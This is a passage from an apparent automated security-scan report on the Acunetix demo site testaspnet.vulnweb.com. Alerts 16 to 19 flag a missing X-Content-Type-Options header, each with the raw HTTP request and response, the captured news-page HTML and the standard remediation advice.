          This issue still applies to error type pages (401, 403, 500, etc.) as those pages are often still affected by injection issues, in which case there is still concern for browsers sniffing pages away from their actual content type.

          At "High" threshold this scan rule will not alert on client or server error responses.

          Request
          Request line and header section (341 bytes)
          GET http://testaspnet.vulnweb.com/ReadNews.aspx?id=0 HTTP/1.1
          Host: testaspnet.vulnweb.com
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
          Pragma: no-cache
          Cache-Control: no-cache
          Referer: http://testaspnet.vulnweb.com/Comments.aspx?id=0
          Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
          
          
          Request body (0 bytes)
          Response
          Status line and header section (222 bytes)
          HTTP/1.1 200 OK
          Cache-Control: private
          Content-Type: text/html; charset=utf-8
          Server: Microsoft-IIS/8.5
          X-AspNet-Version: 2.0.50727
          X-Powered-By: ASP.NET
          Date: Mon, 25 Jul 2022 13:05:19 GMT
          Content-Length: 22687
          
          
          Response body (22687 bytes)
          
          
          Parameter
          X-Content-Type-Options
          Solution

          Ensure that the application/web server sets the Content-Type header appropriately, and that it sets the X-Content-Type-Options header to 'nosniff' for all web pages.

          If possible, ensure that the end user uses a standards-compliant and modern web browser that does not perform MIME-sniffing at all, or that can be directed by the web application/web server to not perform MIME-sniffing.

        16. GET http://testaspnet.vulnweb.com/ReadNews.aspx?id=2
          Alert tags
          Alert description

          The Anti-MIME-Sniffing header X-Content-Type-Options was not set to 'nosniff'. This allows older versions of Internet Explorer and Chrome to perform MIME-sniffing on the response body, potentially causing the response body to be interpreted and displayed as a content type other than the declared content type. Current (early 2014) and legacy versions of Firefox will use the declared content type (if one is set), rather than performing MIME-sniffing.

          Other info

          This issue still applies to error type pages (401, 403, 500, etc.) as those pages are often still affected by injection issues, in which case there is still concern for browsers sniffing pages away from their actual content type.

          At "High" threshold this scan rule will not alert on client or server error responses.

          Request
          Request line and header section (341 bytes)
          GET http://testaspnet.vulnweb.com/ReadNews.aspx?id=2 HTTP/1.1
          Host: testaspnet.vulnweb.com
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
          Pragma: no-cache
          Cache-Control: no-cache
          Referer: http://testaspnet.vulnweb.com/Comments.aspx?id=2
          Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
          
          
          Request body (0 bytes)
          Response
          Status line and header section (222 bytes)
          HTTP/1.1 200 OK
          Cache-Control: private
          Content-Type: text/html; charset=utf-8
          Server: Microsoft-IIS/8.5
          X-AspNet-Version: 2.0.50727
          X-Powered-By: ASP.NET
          Date: Mon, 25 Jul 2022 13:05:20 GMT
          Content-Length: 30393
          
          
          Response body (30393 bytes)
          
          
          Parameter
          X-Content-Type-Options
          Solution

          Ensure that the application/web server sets the Content-Type header appropriately, and that it sets the X-Content-Type-Options header to 'nosniff' for all web pages.

          If possible, ensure that the end user uses a standards-compliant and modern web browser that does not perform MIME-sniffing at all, or that can be directed by the web application/web server to not perform MIME-sniffing.

        17. GET http://testaspnet.vulnweb.com/ReadNews.aspx?id=3
          Alert tags
          Alert description

          The Anti-MIME-Sniffing header X-Content-Type-Options was not set to 'nosniff'. This allows older versions of Internet Explorer and Chrome to perform MIME-sniffing on the response body, potentially causing the response body to be interpreted and displayed as a content type other than the declared content type. Current (early 2014) and legacy versions of Firefox will use the declared content type (if one is set), rather than performing MIME-sniffing.

          Other info

          This issue still applies to error type pages (401, 403, 500, etc.) as those pages are often still affected by injection issues, in which case there is still concern for browsers sniffing pages away from their actual content type.

          At "High" threshold this scan rule will not alert on client or server error responses.

          Request
          Request line and header section (341 bytes)
          GET http://testaspnet.vulnweb.com/ReadNews.aspx?id=3 HTTP/1.1
          Host: testaspnet.vulnweb.com
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
          Pragma: no-cache
          Cache-Control: no-cache
          Referer: http://testaspnet.vulnweb.com/Comments.aspx?id=3
          Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
          
          
          Request body (0 bytes)
          Response
          Status line and header section (222 bytes)
          HTTP/1.1 200 OK
          Cache-Control: private
          Content-Type: text/html; charset=utf-8
          Server: Microsoft-IIS/8.5
          X-AspNet-Version: 2.0.50727
          X-Powered-By: ASP.NET
          Date: Mon, 25 Jul 2022 13:05:20 GMT
          Content-Length: 17827
          
          
          Response body (17827 bytes)
          
          <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
          <HTML>
          	<HEAD>
          		<title>ReadNews</title>
          		<meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR">
          		<meta content="C#" name="CODE_LANGUAGE">
          		<meta content="JavaScript" name="vs_defaultClientScript">
          		<meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema">
          		<LINK href="styles.css" type="text/css" rel="stylesheet">
          	</HEAD>
          	<body>
          		<form name="Form1" method="post" action="ReadNews.aspx?id=3" id="Form1">
          <div>
          <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
          <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
          <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="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" />
          </div>
          
          <script type="text/javascript">
          //<![CDATA[
          var theForm = document.forms['Form1'];
          if (!theForm) {
              theForm = document.Form1;
          }
          function __doPostBack(eventTarget, eventArgument) {
              if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
                  theForm.__EVENTTARGET.value = eventTarget;
                  theForm.__EVENTARGUMENT.value = eventArgument;
                  theForm.submit();
              }
          }
          //]]>
          </script>
          
          
          <div>
          
          	<input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="532053C5" />
          	<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="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" />
          </div>
          			
          <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD>
          		<TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640"
          			height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD>
          	</TR>
          </TABLE>
          <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A>
          			<A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a>  <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup">
          				signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A>
          				<A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A>
          		</TD>
          		<td class="MenuBar" align="right" width="50px">
          			<A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A>
          		</td>
          	</TR>
          </TABLE>
          
          			<TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0">
          				<TR>
          					<TD vAlign="top">
          						<DIV id="divNewsDate" class="NewsDate">posted by <strong>admin                    </strong>11/8/2005 11:37:35 AM</DIV>
          						<DIV id="divNewsTitle" class="NewsTitle">Acunetix Web Vulnerability Scanner beta released!</DIV>
          						<DIV id="divNewsLong" class="NewsLong"><p>During the beta phase, builds are released frequently,                            therefore it is not recommended that the same beta version                            is used for more than 30 days. To beta-test beyond 30                            days, users should install the latest beta version or,                            if available, use the release version.</p>                           <p><strong>About Acunetix Web Vulnerability Scanner</strong><br />                           Acunetix Web Vulnerability Scanner, a unique web application                            scanning product that makes securing one&rsquo;s website                            easier than ever. Acunetix Web Vulnerability Scanner                            is an automated web application security testing tool                            that crawls an entire website and attacks it so as to                            identify potential weaknesses before hackers do. Further                            information is available <a href=https://www.acunetix.com/vulnerability-scanner/>here</a>.</p>                           <p><strong>About Acunetix</strong></p>     <p>User-friendly and competitively priced, Acunetix leads the market in automatic web security testing technology. Its industry-leading crawler fully supports HTML5, JavaScript, and AJAX-heavy websites, enabling the auditing of complex, authenticated applications. Acunetix provides the only technology on the market that can automatically detect out-of-band vulnerabilities and is available both as an online and on-premises solution. Acunetix also includes integrated vulnerability management features to extend the enterprise&rsquo;s ability to comprehensively manage, prioritize, and control vulnerability threats &ndash; ordered by business criticality.</p></DIV>
          						<TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0">
          							<TR>
          								<TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD>
          							</TR>
          							<TR>
          								<TD class="Comment" vAlign="middle">
          									<a id="hlComments" href="Comments.aspx?id=3">Read user comments</a></TD>
          							</TR>
          							<TR>
          								<TD vAlign="top"><IMG src="images/comment-after.gif"></TD>
          							</TR>
          						</TABLE>
          						<center>
          						<iframe id="adsFrame" width="200" height="110" style="BORDER-RIGHT: lemonchiffon 1px solid; BORDER-TOP: lemonchiffon 1px solid; BORDER-LEFT: lemonchiffon 1px solid; BORDER-BOTTOM: lemonchiffon 1px solid" frameBorder="no" scrolling="no"></iframe>
          						</center>
          					</TD>
          					<TD vAlign="top" width="200" colSpan="2">
          <a href="rssFeed.aspx">Get RSS feed</a>
          
          					</TD>
          				</TR>
          				<TR>
          					<TD colSpan="3"></TD>
          				</TR>
          			</TABLE>
          		</form>
          	</body>
          	<div style="background-color:lightgray;width:40%;margin:auto;left:30%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px">
          		<p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p>
          	</div>
          </HTML>
          
          Parameter
          X-Content-Type-Options
          Solution

          Ensure that the application/web server sets the Content-Type header appropriately, and that it sets the X-Content-Type-Options header to 'nosniff' for all web pages.

          If possible, ensure that the end user uses a standards-compliant and modern web browser that does not perform MIME-sniffing at all, or that can be directed by the web application/web server to not perform MIME-sniffing.

        18. GET http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads/def.html&id=0
          Alert tags
          Alert description

          The Anti-MIME-Sniffing header X-Content-Type-Options was not set to 'nosniff'. This allows older versions of Internet Explorer and Chrome to perform MIME-sniffing on the response body, potentially causing the response body to be interpreted and displayed as a content type other than the declared content type. Current (early 2014) and legacy versions of Firefox will use the declared content type (if one is set), rather than performing MIME-sniffing.

          Other info

          This issue still applies to error type pages (401, 403, 500, etc.) as those pages are often still affected by injection issues, in which case there is still concern for browsers sniffing pages away from their actual content type.

          At "High" threshold this scan rule will not alert on client or server error responses.

          Request
          Request line and header section (342 bytes)
          GET http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads/def.html&id=0 HTTP/1.1
          Host: testaspnet.vulnweb.com
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
          Pragma: no-cache
          Cache-Control: no-cache
          Referer: http://testaspnet.vulnweb.com
          Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
          
          
          Request body (0 bytes)
          Response
          Status line and header section (222 bytes)
          HTTP/1.1 200 OK
          Cache-Control: private
          Content-Type: text/html; charset=utf-8
          Server: Microsoft-IIS/8.5
          X-AspNet-Version: 2.0.50727
          X-Powered-By: ASP.NET
          Date: Mon, 25 Jul 2022 13:05:18 GMT
          Content-Length: 22752
          
          
          Response body (22752 bytes)
          
          <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
          <HTML>
          	<HEAD>
          		<title>ReadNews</title>
          		<meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR">
          		<meta content="C#" name="CODE_LANGUAGE">
          		<meta content="JavaScript" name="vs_defaultClientScript">
          		<meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema">
          		<LINK href="styles.css" type="text/css" rel="stylesheet">
          	</HEAD>
          	<body>
          		<form name="Form1" method="post" action="ReadNews.aspx?NewsAd=ads%2fdef.html&amp;id=0" id="Form1">
          <div>
          <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
          <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
          <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="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" />
          </div>
          
          <script type="text/javascript">
          //<![CDATA[
          var theForm = document.forms['Form1'];
          if (!theForm) {
              theForm = document.Form1;
          }
          function __doPostBack(eventTarget, eventArgument) {
              if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
                  theForm.__EVENTTARGET.value = eventTarget;
                  theForm.__EVENTARGUMENT.value = eventArgument;
                  theForm.submit();
              }
          }
          //]]>
          </script>
          
          
          <div>
          
          	<input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="532053C5" />
          	<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="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" />
          </div>
          			
          <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD>
          		<TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640"
          			height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD>
          	</TR>
          </TABLE>
          <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A>
          			<A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a>  <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup">
          				signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A>
          				<A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A>
          		</TD>
          		<td class="MenuBar" align="right" width="50px">
          			<A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A>
          		</td>
          	</TR>
          </TABLE>
          
          			<TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0">
          				<TR>
          					<TD vAlign="top">
          						<DIV id="divNewsDate" class="NewsDate">posted by <strong>admin                    </strong>5/16/2019 12:32:30 PM</DIV>
          						<DIV id="divNewsTitle" class="NewsTitle">Acunetix Vulnerability Scanner Now With Network Security Scans</DIV>
          						<DIV id="divNewsLong" class="NewsLong"><p><strong>London, UK</strong> &ndash; <strong>May 2019</strong> &ndash; Acunetix, the pioneer in automated web application security software, has announced that all versions of the <a href=https://www.acunetix.com/vulnerability-scanner/>Acunetix Vulnerability Scanner</a> now support <a href=https://www.acunetix.com/vulnerability-scanner/network-security-scanner/>network security scanning</a>. Network security scans are possible thanks to the seamless integration of Acunetix with the powerful OpenVAS security solution. Until now, network security scanning functionality was available only in Acunetix Online.</p>     <p>&ldquo;No matter the size of your business, you use multiple security measures to alleviate different types of risks. Your security strategy must always include both web security scans and network security scans. And it makes it so much easier and much more efficient if you can do the two together using a single integrated tool,&rdquo; said Nicolas Sciberras, CTO.</p>     <p>There are many advantages of running network security scans in Acunetix. Having a single integrated dashboard with both web and network vulnerabilities gives the best possible risk visibility and saves a lot of time and effort. Network scans may also benefit from other Acunetix features, such as <a href=https://www.acunetix.com/vulnerability-scanner/acunetix-integrations/>issue tracker integration</a> and <a href=https://www.acunetix.com/vulnerability-scanner/vulnerability-management-regulatory-compliance/>comprehensive reporting</a>.</p>     <p><strong>More Features in the Latest Build</strong></p>     <p>OpenVAS integration is introduced as part of the latest Acunetix version 12 build (<a href=https://www.acunetix.com/blog/releases/new-build-network-scanning-integration-ipv6-support/>build 12.0.190515149</a>). 
This new build also includes:</p>     <p>- Support for IPv6<br />     - Improved usage of machine resources<br />     - Added support for Selenium scripts as import files<br />     - Multiple vulnerability checks for SAP<br />     - Unauthorized access detection for Redis and Memcached<br />     - Source code disclosure for Ruby and Python</p>     <p>The new build also includes a number of updates and fixes, all of which are available for both Windows and Linux. More information can be found <a href=https://www.acunetix.com/blog/releases/new-build-network-scanning-integration-ipv6-support/>here</a>.</p>     <p>Get a demo of the product <a href=https://www.acunetix.com/network-security-scanner/>here</a>.</p>     <p><strong>About Acunetix</strong></p>     <p>User-friendly and competitively priced, Acunetix leads the market in automatic web security testing technology. Its industry-leading crawler fully supports HTML5, JavaScript, and AJAX-heavy websites, enabling the auditing of complex, authenticated applications. Acunetix provides the only technology on the market that can automatically detect out-of-band vulnerabilities and is available both as an online and on-premises solution. Acunetix also includes integrated vulnerability management features to extend the enterprise&rsquo;s ability to comprehensively manage, prioritize, and control vulnerability threats &ndash; ordered by business criticality.</p>     <p><strong>Acunetix, the Company</strong></p>     <p>Founded in 2004 to combat the alarming rise in web application attacks, Acunetix is the market leader and a pioneer in automated web application security technology. From individual consultants to enterprises, penetration testers and security experts globally depend on Acunetix products and technologies. 
It is the tool of choice for many customers across sectors, including Government, Military, Education, Telecommunications, Banking, Finance, and E-Commerce sectors as well as many Fortune 500 companies such as the Pentagon, Harper Collins, Disney, Adobe, and many more.</p></DIV>
          						<TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0">
          							<TR>
          								<TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD>
          							</TR>
          							<TR>
          								<TD class="Comment" vAlign="middle">
          									<a id="hlComments" href="Comments.aspx?id=0">Read user comments</a></TD>
          							</TR>
          							<TR>
          								<TD vAlign="top"><IMG src="images/comment-after.gif"></TD>
          							</TR>
          						</TABLE>
          						<center>
          						<iframe id="adsFrame" src="ads/def.html" width="200" height="110" style="BORDER-RIGHT: lemonchiffon 1px solid; BORDER-TOP: lemonchiffon 1px solid; BORDER-LEFT: lemonchiffon 1px solid; BORDER-BOTTOM: lemonchiffon 1px solid" frameBorder="no" scrolling="no"></iframe>
          						</center>
          					</TD>
          					<TD vAlign="top" width="200" colSpan="2">
          <a href="rssFeed.aspx">Get RSS feed</a>
          
          					</TD>
          				</TR>
          				<TR>
          					<TD colSpan="3"></TD>
          				</TR>
          			</TABLE>
          		</form>
          	</body>
          	<div style="background-color:lightgray;width:40%;margin:auto;left:30%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px">
          		<p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p>
          	</div>
          </HTML>
          
          Parameter
          X-Content-Type-Options
          Solution

          Ensure that the application/web server sets the Content-Type header appropriately, and that it sets the X-Content-Type-Options header to 'nosniff' for all web pages.

          If possible, ensure that the end user uses a standards-compliant and modern web browser that does not perform MIME-sniffing at all, or that can be directed by the web application/web server to not perform MIME-sniffing.

        19. GET http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads/def.html&id=2
          Alert tags
          Alert description

          The Anti-MIME-Sniffing header X-Content-Type-Options was not set to 'nosniff'. This allows older versions of Internet Explorer and Chrome to perform MIME-sniffing on the response body, potentially causing the response body to be interpreted and displayed as a content type other than the declared content type. Current (early 2014) and legacy versions of Firefox will use the declared content type (if one is set), rather than performing MIME-sniffing.

          Other info

          This issue still applies to error type pages (401, 403, 500, etc.) as those pages are often still affected by injection issues, in which case there is still concern for browsers sniffing pages away from their actual content type.

          At "High" threshold this scan rule will not alert on client or server error responses.

          Request
          Request line and header section (342 bytes)
          GET http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads/def.html&id=2 HTTP/1.1
          Host: testaspnet.vulnweb.com
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
          Pragma: no-cache
          Cache-Control: no-cache
          Referer: http://testaspnet.vulnweb.com
          Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
          
          
          Request body (0 bytes)
          Response
          Status line and header section (222 bytes)
          HTTP/1.1 200 OK
          Cache-Control: private
          Content-Type: text/html; charset=utf-8
          Server: Microsoft-IIS/8.5
          X-AspNet-Version: 2.0.50727
          X-Powered-By: ASP.NET
          Date: Mon, 25 Jul 2022 13:05:18 GMT
          Content-Length: 30454
          
          
          Response body (30454 bytes)
          
          <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
          <HTML>
          	<HEAD>
          		<title>ReadNews</title>
          		<meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR">
          		<meta content="C#" name="CODE_LANGUAGE">
          		<meta content="JavaScript" name="vs_defaultClientScript">
          		<meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema">
          		<LINK href="styles.css" type="text/css" rel="stylesheet">
          	</HEAD>
          	<body>
          		<form name="Form1" method="post" action="ReadNews.aspx?NewsAd=ads%2fdef.html&amp;id=2" id="Form1">
          <div>
          <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
          <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
          <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="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" />
          </div>
          
          <script type="text/javascript">
          //<![CDATA[
          var theForm = document.forms['Form1'];
          if (!theForm) {
              theForm = document.Form1;
          }
          function __doPostBack(eventTarget, eventArgument) {
              if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
                  theForm.__EVENTTARGET.value = eventTarget;
                  theForm.__EVENTARGUMENT.value = eventArgument;
                  theForm.submit();
              }
          }
          //]]>
          </script>
          
          
          <div>
          
          	<input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="532053C5" />
          </div>
          			
          <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD>
          		<TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640"
          			height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD>
          	</TR>
          </TABLE>
          <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A>
          			<A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a>  <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup">
          				signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A>
          				<A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A>
          		</TD>
          		<td class="MenuBar" align="right" width="50px">
          			<A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A>
          		</td>
          	</TR>
          </TABLE>
          
          			<TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0">
          				<TR>
          					<TD vAlign="top">
          						<DIV id="divNewsDate" class="NewsDate">posted by <strong>admin                    </strong>11/8/2005 11:35:22 AM</DIV>
          						<DIV id="divNewsTitle" class="NewsTitle">Web attacks - can your web applications withstand the force?</DIV>
          						<DIV id="divNewsLong" class="NewsLong"><p><strong>Acunetix combats rise in web attacks with Acunetix                            Web Vulnerability Scanner 2 </strong></p>                           <p>21 July 2005 - <strong>Start-up company Acunetix released                            Acunetix Web Vulnerability Scanner: a tool to automatically                            audit website security. Acunetix Web Vulnerability Scanner                            2 crawls an entire website, launches popular web attacks                            (SQL Injection etc.) and identifies vulnerabilities                            that need to be fixed.</strong> </p>                           <p><strong>Securing your website should be your number one                            concern</strong><br />                           Hackers are concentrating their efforts on web-based                            applications - 75% of cyber attacks are done at the                            web application level, a Gartner Group study has revealed.                            Web applications are accessible 24 hours a day, 7 days                            a week and control valuable data such as customer information,                            transaction information and even proprietary corporate                            data.</p>                           <p><strong>500,000 customer credit card numbers obtained via                            a web attack</strong><br />                           Well-known sites that were open to web application attacks                            include fashion label Guess and pet supply retailer                            PetCo.com who were notoriously found to be vulnerable                            to the SQL injection vulnerability (June 2003). 
This                            resulted in PetCo leaving as many as 500,000 credit                            card numbers open to anyone able to construct this specially-crafted                            URL.</p>                           <p><strong>Firewalls, SSL and locked-down servers are futile                            against web application hacking</strong><br />                           Any defense at network security level will provide no                            protection against web application attacks since they                            are launched on port 80 - which has to remain open.                            In addition, web applications (customer areas, shopping                            carts etc.) are often tailor-made, invariably tested                            less than off-the-shelf software and are therefore more                            susceptible to attack.</p>                           <p>&quot;Companies have implemented network-level security,                            however they fail to audit and secure their web applications.                            These applications have access to sensitive data and                            are a hacker's prime target,&quot; said Nick Galea,                            CEO of Acunetix. &quot;Auditing one's web apps should                            be the number one security concern.&quot;</p>                           <p><strong>The need for an automated web application vulnerability                            scanner</strong><br />                           Manually auditing a web application for vulnerabilities                            to SQL injection, cross site scripting and other web                            attacks is virtually impossible. With Acunetix Web Vulnerability                            Scanner the process of auditing web applications such                            as shopping carts and forms, can be easily automated.                            
What's more, the security checks can easily be re-launched                            for each application update.</p>                           <p><strong>How Acunetix Web Vulnerability Scanner works</strong><br />                           Acunetix WVS first crawls the whole website, analyzes                            in-depth each file it finds, and displays the entire                            website structure. After this discovery stage, it performs                            an automatic audit for common security vulnerabilities.</p>                           <p><strong>Automatically detects SQL injection, cross site                            scripting and other web vulnerabilities</strong><br />                           SQL injection is a hacking technique which modifies                            SQL commands in order to gain access to data in the                            database. Cross site scripting attacks allow a hacker                            to execute a malicious script on your visitors' browser.                            Acunetix Web Vulnerability Scanner can check if your                            web application is vulnerable to both of these attacks.                            
More information about cross site scripting &amp; SQL                            injection at our website security info page.</p>                           <p><strong>Acunetix Web Vulnerability Scanner also checks for                            the following web attacks:</strong></p>                           <ul> <li>CRLF injection attacks<br />                           </li><li>Code execution attacks<br />                           </li><li>Directory traversal attacks<br />                           </li><li>File inclusion attacks<br />                           </li><li> Input validation attacks<br />                           </li><li>Authentication attacks.</li> </ul>                           <p><strong>Advanced penetration testing tools</strong><br />                           Acunetix WVS also includes tools such as an HTTP editor                            &amp; HTTP sniffer to allow customization of web vulnerability                            checks. Using the Vulnerability editor, new attacks                            can easily be created.</p>                           <p><strong>Pricing &amp; availability</strong><br />                           Acunetix WVS is available as an enterprise or as a consultant                            version. A subscription based license can be purchased                            for as little as $395, whereas a perpetual license starts                            at $2995. For more information visit our pricing page.</p>                           <p><strong>About Acunetix</strong></p>     <p>User-friendly and competitively priced, Acunetix leads the market in automatic web security testing technology. Its industry-leading crawler fully supports HTML5, JavaScript, and AJAX-heavy websites, enabling the auditing of complex, authenticated applications. Acunetix provides the only technology on the market that can automatically detect out-of-band vulnerabilities and is available both as an online and on-premises solution. 
Acunetix also includes integrated vulnerability management features to extend the enterprise&rsquo;s ability to comprehensively manage, prioritize, and control vulnerability threats &ndash; ordered by business criticality.</p></DIV>
          						<TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0">
          							<TR>
          								<TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD>
          							</TR>
          							<TR>
          								<TD class="Comment" vAlign="middle">
          									<a id="hlComments" href="Comments.aspx?id=2">Read user comments</a></TD>
          							</TR>
          							<TR>
          								<TD vAlign="top"><IMG src="images/comment-after.gif"></TD>
          							</TR>
          						</TABLE>
          						<center>
          						<iframe id="adsFrame" src="ads/def.html" width="200" height="110" style="BORDER-RIGHT: lemonchiffon 1px solid; BORDER-TOP: lemonchiffon 1px solid; BORDER-LEFT: lemonchiffon 1px solid; BORDER-BOTTOM: lemonchiffon 1px solid" frameBorder="no" scrolling="no"></iframe>
          						</center>
          					</TD>
          					<TD vAlign="top" width="200" colSpan="2">
          						<table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;">
          	<tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;">
          		<tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month">&lt;</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">&gt;</a></td></tr>
